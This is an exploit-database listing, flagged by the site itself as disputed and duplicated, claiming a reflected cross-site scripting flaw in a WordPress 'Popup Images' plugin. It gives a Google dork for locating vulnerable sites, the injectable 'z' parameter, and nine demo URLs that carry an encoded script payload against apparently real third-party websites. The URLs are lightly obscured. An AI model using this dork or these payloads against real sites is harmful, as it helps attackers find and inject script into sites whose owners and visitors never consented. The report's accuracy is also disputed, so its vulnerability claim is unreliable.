Disputed / BOGUS

WordPress Popup Images Cross Site Scripting

Published
Credit
Risk
2014.06.02
Milad Hacking
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: inurl:/wp-content/plugins/popup-images

DUPLICATED

http://cxsecurity.com/issue/WLB-2014050118

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Plugin Popup Images Cross Site Scripting
[+]
[+] Exploit Author: Milad Hacking
[+]
[+] Date: 2014-06-1
[+]
[+] Google Dork : inurl:/wp-content/plugins/popup-images
[+]
[+] Vendor Homepage : http://www.Wordpress.org
[+]
[+] Tested on: Windows 7 , Mozilla FireFox
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Location :
[localhost]/wp-content/plugins/popup-images/popup.php?z=[XSS]

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Demo :

http://www.kornXels-welt.de/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20LOL/%29;%3C/script%3E

http://www.lioXns-borsdorf-parthenaue.de/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://thefilmlXot.com/tflblogwp/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tsXcktsarina.com/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://sinkaXrto.hu/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.liXons-borsdorf-parthenaue.de/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tomaXsvasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.toXmasvasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E

http://www.tomasvXasquez.com.br/blog/wp-content/plugins/popup-images/popup.php?z=%22/%3E%3Cscript%3Ealert%28/XSS%20Lol/%29;%3C/script%3E


[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking

We Love Mohammad

Mail : milad.hacking.blackhat@gmail.com

Home Page : https://www.facebook.com/milad.hacking.5

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

http://cxsecurity.com/issue/WLB-2014050118


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com